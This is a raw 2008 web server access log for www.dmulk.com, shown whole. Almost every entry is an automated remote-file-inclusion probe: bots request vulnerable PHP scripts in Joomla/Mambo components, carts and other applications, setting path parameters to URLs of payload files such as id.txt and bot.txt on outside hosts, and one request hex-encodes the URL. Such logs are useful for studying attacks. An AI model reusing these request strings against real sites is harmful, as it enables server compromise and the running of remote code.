74.220.215.63 - - [22/Sep/2008:09:52:27 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:09:52:27 -0700] "GET //components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:09:52:29 -0700] "GET /logs/access_080304.log//sef.php?mosConfig_absolute_path=http://ebooks.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:09:52:30 -0700] "GET //sef.php?mosConfig_absolute_path=http://ebooks.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:09:52:30 -0700] "GET /logs//sef.php?mosConfig_absolute_path=http://ebooks.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:52:33 -0700] "GET /logs/access_070719.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:53:09 -0700] "GET /logs/access_080316.log/index3.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:53:09 -0700] "GET /index3.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.209 - - [22/Sep/2008:09:53:09 -0700] "GET /logs/index3.php?mosConfig_absolute_path=http://www.intertex99.com/images/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:53:23 -0700] "GET /logs/access_080609.log/port.php?content=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:53:23 -0700] "GET /port.php?content=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:53:23 -0700] "GET /logs/port.php?content=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:53:23 -0700] "GET /logs/access_071201.log/port.php?content=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.190.202.150 - - [22/Sep/2008:09:53:29 -0700] "GET /logs/access_080216.log//administrator/index.php?option=com_expose&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.190.202.150 - - [22/Sep/2008:09:53:29 -0700] "GET //administrator/index.php?option=com_expose&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.190.202.150 - - [22/Sep/2008:09:53:30 -0700] "GET /logs//administrator/index.php?option=com_expose&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.218.59 - - [22/Sep/2008:09:53:38 -0700] "GET //sef.php?mosConfig_absolute_path=http://ebooks.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.56.34 - - [22/Sep/2008:09:53:40 -0700] "GET /logs/?sourcedir=http://gta.gta4life.net/bot.txt?? HTTP/1.1" 200 66157 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.17.56.34 - - [22/Sep/2008:09:53:42 -0700] "GET /?sourcedir=http://gta.gta4life.net/bot.txt?? HTTP/1.1" 200 94655 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.190.202.150 - - [22/Sep/2008:09:53:52 -0700] "GET /logs/access_080708.log//administrator/index.php?option=com_expose&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:53:55 -0700] "GET /logs/access_080717.log/home.php?content=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:53:55 -0700] "GET /home.php?content=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:53:55 -0700] "GET /logs/home.php?content=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:54:03 -0700] "GET /logs/access_070719.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:54:05 -0700] "GET /logs/access_080723.log/home.php?content=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:09:54:07 -0700] "GET //components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:54:09 -0700] "GET ///vwar/backup/errors.php?error=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.104.33.186 - - [22/Sep/2008:09:54:33 -0700] "GET /logs/access_080427.log//modules/xfsection/modify.php?dir_module=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.36.144.8 - - [22/Sep/2008:09:55:10 -0700] "GET /blog/index.php/comm HTTP/1.0" 404 8072 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:55:44 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.67.202.75 - - [22/Sep/2008:09:55:45 -0700] "GET /logs/access_080825.log/erors.php?error=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
58.177.86.197 - - [22/Sep/2008:09:55:50 -0700] "GET //administrator/index.php?option=com_remository&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
142.150.98.171 - - [22/Sep/2008:09:55:51 -0700] "GET /logs/access_080412.log/?sourcedir=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
142.150.98.171 - - [22/Sep/2008:09:55:51 -0700] "GET /logs/?sourcedir=http://chebugis.net/chid.txt??? HTTP/1.1" 200 66163 "-" "libwww-perl/5.79" "www.dmulk.com"
142.150.98.171 - - [22/Sep/2008:09:55:52 -0700] "GET /?sourcedir=http://chebugis.net/chid.txt??? HTTP/1.1" 200 94671 "-" "libwww-perl/5.79" "www.dmulk.com"
142.150.98.171 - - [22/Sep/2008:09:55:58 -0700] "GET /logs/access_080313.log/?sourcedir=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:57:01 -0700] "GET /logs/access_080524.log%20/home.php?content=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.251.174.138 - - [22/Sep/2008:09:57:01 -0700] "GET /index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 200 94932 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:57:04 -0700] "GET /logs/access_080717.log%20/home.php?content=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:09:57:19 -0700] "GET /logs/access_080315.log/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:09:57:19 -0700] "GET /logs/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:09:57:26 -0700] "GET /logs/access_080319.log/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [22/Sep/2008:09:57:29 -0700] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:09:57:31 -0700] "GET /index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.fotohead.nl/admin/bo.do? HTTP/1.1" 200 95002 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:57:38 -0700] "GET /logs/access_080729.log/index2.php?ID=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.251.174.138 - - [22/Sep/2008:09:57:42 -0700] "GET /logs/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:09:57:49 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:09:57:50 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:09:57:50 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:09:57:56 -0700] "GET //sef.php?mosConfig_absolute_path=http://ebooks.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.195.37.158 - - [22/Sep/2008:09:58:08 -0700] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:09:58:11 -0700] "GET /logs/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.fotohead.nl/admin/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:09:58:45 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:09:58:46 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:09:58:47 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.160.79.6 - - [22/Sep/2008:09:58:52 -0700] "GET /logs/access_080228.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.62.114 - - [22/Sep/2008:09:59:01 -0700] "GET //errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:59:02 -0700] "GET /index1.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:59:02 -0700] "GET /logs/access_080307.log/index1.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:59:02 -0700] "GET /logs/index1.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:59:06 -0700] "GET /index2.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:59:06 -0700] "GET /logs/index2.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:59:09 -0700] "GET /logs/access_080507.log/index1.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.198.174 - - [22/Sep/2008:09:59:16 -0700] "GET /logs/access_080825.log//sef.php?mosConfig_absolute_path=http://ebooks.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:59:29 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:59:30 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:59:31 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:59:32 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:59:41 -0700] "GET /logs/access_080502.log//components/com_simpleboard/image_upload.php?sbp=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.104.33.186 - - [22/Sep/2008:09:59:48 -0700] "GET //modules/xfsection/modify.php?dir_module=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:10:00:02 -0700] "GET /logs/access_080526.log/index2.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:10:00:02 -0700] "GET /logs/access_080317.log/index2.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.87.129.138 - - [22/Sep/2008:10:00:11 -0700] "GET /logs/access_080703.log/errors.php?error=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.87.129.138 - - [22/Sep/2008:10:00:11 -0700] "GET /errors.php?error=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.87.129.138 - - [22/Sep/2008:10:00:12 -0700] "GET /logs/errors.php?error=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:00:13 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:00:14 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:00:18 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:00:18 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:00:18 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:00:18 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.29.87.145 - - [22/Sep/2008:10:00:19 -0700] "GET /logs/access_080714.log//dotproject//includes/db_connect.php?baseDir=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.87.145 - - [22/Sep/2008:10:00:24 -0700] "GET //dotproject//includes/db_connect.php?baseDir=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:00:25 -0700] "GET /logs/access_080502.log//components/com_simpleboard/image_upload.php?sbp=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:00:28 -0700] "GET /logs/access_080502.log//components/com_simpleboard/image_upload.php?sbp=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:10:00:37 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.79.206 - - [22/Sep/2008:10:00:40 -0700] "GET /logs/access_080315.log%20/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:00:43 -0700] "GET /logs/access_080209.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:10:00:43 -0700] "GET /logs/access_080707.log/home.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:10:00:43 -0700] "GET /home.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:10:00:44 -0700] "GET /logs/home.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:00:47 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:10:00:49 -0700] "GET /logs/access_080507.log%20/index1.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:00:50 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:10:00:59 -0700] "GET /logs/access_080505.log/home.php?x=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:01:00 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:01:01 -0700] "GET /logs/access_080209.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:01:01 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:01:02 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:01:06 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
62.87.154.41 - - [22/Sep/2008:10:01:10 -0700] "GET /logs/access_071228.log//tools/send_reminders.php?noSet=0&includedir=http://amix.jw.lt/bigdozid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.244.233.121 - - [22/Sep/2008:10:01:10 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://origostaff.com/administrator/components/com_remository/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [22/Sep/2008:10:01:10 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://origostaff.com/administrator/components/com_remository/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.87.154.41 - - [22/Sep/2008:10:01:13 -0700] "GET /logs/access_071228.log//tools/send_reminders.php?noSet=0&includedir=http://amix.jw.lt/bigdozid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:10:01:13 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
190.54.62.91 - - [22/Sep/2008:10:01:26 -0700] "GET /errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:01:33 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
141.44.140.111 - - [22/Sep/2008:10:01:42 -0700] "GET /logs/access_080524.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://p-c-b.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:01:53 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:01:53 -0700] "GET /logs/access_080209.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:01:55 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:10:02:01 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
